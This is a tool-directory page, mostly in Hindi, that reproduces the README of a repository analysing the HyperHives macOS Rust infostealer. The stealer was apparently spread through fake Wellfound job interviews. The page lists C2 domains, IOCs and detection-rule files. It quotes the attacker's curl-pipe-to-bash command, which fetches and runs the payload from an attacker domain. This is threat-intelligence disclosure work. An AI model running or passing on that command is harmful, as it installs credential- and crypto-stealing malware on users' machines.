Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
hyperhives-macos-infostealer-analysis — पूर्ण स्थैतिक विश्लेषण HyperHives macOS Rust infostealer का — 571 डिक्रिप्टेड कॉन्फ़िग मान, C2 बुनियादी ढांचा, DPRK/Contagious Interview आरोपण, YARA/Sigma नियम, STIX 2.1 बंडल, ATT&CK Navigator परत | Kitploit
उपकरण/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
समझौता संकेतक (IOC) प्रबंधनOSINT (खुला स्रोत खुफिया)रिवर्स इंजीनियरिंगफोरेंसिकमालवेयर विश्लेषणखतरा खुफियापेपर और शोधलर्निंग और शिक्षाचयनित संसाधन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

पूर्ण स्थैतिक विश्लेषण HyperHives macOS Rust infostealer का — 571 डिक्रिप्टेड कॉन्फ़िग मान, C2 बुनियादी ढांचा, DPRK/Contagious Interview आरोपण, YARA/Sigma नियम, STIX 2.1 बंडल, ATT&CK Navigator परत

रिपॉजिटरी देखेंवेबसाइट
314135 महीने पहलेKitploit द्वारा समीक्षित
साझा करें

HyperHives macOS Infostealer — पूर्ण तकनीकी विश्लेषण

Validate Repository License: MIT STIX 2.1 ATT&CK Navigator

खतरा बुद्धिमत्ता: Rust-आधारित macOS यूनिवर्सल बाइनरी इन्फोस्टीलर जो Wellfound (पूर्व में AngelList) पर नकली नौकरी साक्षात्कार पाइपलाइन के माध्यम से वितरित किया गया। "HyperHive" से ऑपरेटर व्यक्तित्व "Felix" ने लक्ष्यों को macos.hyperhives.net से एक दुर्भावनापूर्ण इंस्टॉलर चलाने के लिए लालच दिया। यह रिपॉजिटरी पूर्ण स्थैतिक विश्लेषण दस्तावेज़ित करती है: 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान पुनर्प्राप्त किए गए, जिनमें C2 URL, एक Sentry DSN, और 276 लक्षित Chrome एक्सटेंशन आईडी शामिल हैं।

नमूना SHA-2565c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
C2 डोमेनcloudproxy.link
वितरण डोमेनmacos.hyperhives.net
लालच मंचWellfound (पूर्व में AngelList)
ऑपरेटर व्यक्तित्व"HyperHive" पर "Felix"
वायरसटोटल9 / 63 डिटेक्शन
वर्गीकरणसार्वजनिक प्रकटीकरण / IOC बंडल
अंतिम अद्यतनअप्रैल 2026

सामग्री

  • खतरा-बुद्धिमत्ता बंडल
  • रिपॉजिटरी लेआउट
  • त्वरित प्रारंभ
  • TL;DR
  • 1 — यह कैसे शुरू हुआ
  • 2 — बाइनरी
  • 3 — यह क्या चुराता है
  • 4 — डिक्रिप्टेड C2 बुनियादी ढांचा
  • 5 — एट्रिब्यूशन
  • 6 — क्रिप्टैनालिसिस
  • 7 — MITRE ATT&CK मैपिंग
  • 8 — वॉलेट और एक्सटेंशन-आईडी संदर्भ
  • 9 — अनुशंसित कार्रवाइयाँ
  • 10 — पद्धति
  • परिशिष्ट A — सभी 276 Chrome एक्सटेंशन आईडी
  • दायरा और सीमाएँ
  • रिलीज़ इतिहास
  • योगदान
  • लाइसेंस

खतरा-बुद्धिमत्ता बंडल

फ़ाइलप्रारूपउद्देश्य
iocs.txtसादा पाठहैश, डोमेन, URL, आईपी, ईमेल, Sentry ID — ब्लॉकलिस्ट, MISP, OpenCTI में पेस्ट करें
yara_rules.yarYARA 4.2+ज्ञात-नमूना हैश मिलान + Mach-O के लिए ह्यूरिस्टिक स्ट्रिंग डिटेक्शन
sigma_rules.ymlSigmaप्रॉक्सी, DNS, और प्रक्रिया-निर्माण नियम — अपने SIEM के लिए logsource ट्यून करें
stix/bundle.jsonSTIX 2.1मशीन-पठनीय CTI बंडल जिसमें संकेतक, मैलवेयर SDO, बुनियादी ढांचा, ATT&CK पैटर्न और संबंध शामिल हैं
attack-navigator-layer.jsonATT&CK Navigatorदृश्य तकनीक कवरेज के लिए ATT&CK Navigator में आयात करें

रिपॉजिटरी लेआउट```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## त्वरित आरंभ

नमूने को `sample/installer_binary` के रूप में रखें (हैश सत्यापन के लिए [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) देखें), फिर:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

The compose file enforces network_mode: none, read_only: true, and drops all Linux capabilities. See SECURITY.md for full handling guidelines.


TL;DR

A job posting on Wellfound (formerly AngelList) led to a multi-email social-engineering chain from an operator persona "Felix" at "HyperHive". After flattering the target's technical background and scheduling a fake interview, the attacker directed the victim to "review the product" at hyperhives.net and specifically examine Settings → Diagnostics → Log — a pretext to trigger execution of:``` curl -s https://macos.hyperhives.net/install | nohup bash &

पेलोड एक **8.5 MB का Mach-O यूनिवर्सल बाइनरी** (x86_64 + arm64) है, जिसे Rust में संकलित किया गया है। एक एयर-गैप्ड Docker लैब और **570 अद्वितीय x86_64 हेल्पर रूटीन** के CPU एमुलेशन के साथ स्टैटिक विश्लेषण ने **सभी 571 एन्क्रिप्टेड कॉन्फ़िगरेशन मान** पुनर्प्राप्त किए, जिससे यह उजागर हुआ:

- **C2:** `cloudproxy.link` — चार HTTPS एंडपॉइंट
- **Sentry (एट्रिब्यूशन पिवट):** `ingest.de.sentry.io` पर org/project आईडी के साथ पूर्ण DSN
- **बिल्ड पहचान:** Cargo उपयोगकर्ता `rootr`, कोडनेम `force`, संस्करण `9.12.1`
- **लक्ष्य:** 276 Chrome एक्सटेंशन आईडी (क्रिप्टो वॉलेट, पासवर्ड मैनेजर, कॉर्पोरेट क्रेडेंशियल)

रणनीति **DPRK-लिंक्ड Contagious Interview** अभियानों के अनुरूप है — वैध प्लेटफ़ॉर्म पर नकली नौकरी भर्ती, मल्टी-स्टेप विश्वास निर्माण, `curl | bash` डिलीवरी, Rust macOS स्टीलर, और क्रिप्टो-केंद्रित एक्सफ़िल्ट्रेशन।

---

## 1 — यह कैसे शुरू हुआ

### लालच: Wellfound पर नकली नौकरी साक्षात्कार

हमला **Wellfound (पूर्व में AngelList) पर एक वैध दिखने वाली नौकरी पोस्टिंग** से शुरू हुआ। लक्ष्य द्वारा आवेदन करने के बाद, "Felix" नामक व्यक्तित्व और "HyperHive" कंपनी नाम का उपयोग करने वाले एक ऑपरेटर से निम्नलिखित ईमेल श्रृंखला शुरू हुई:
टूल डाउनलोड करें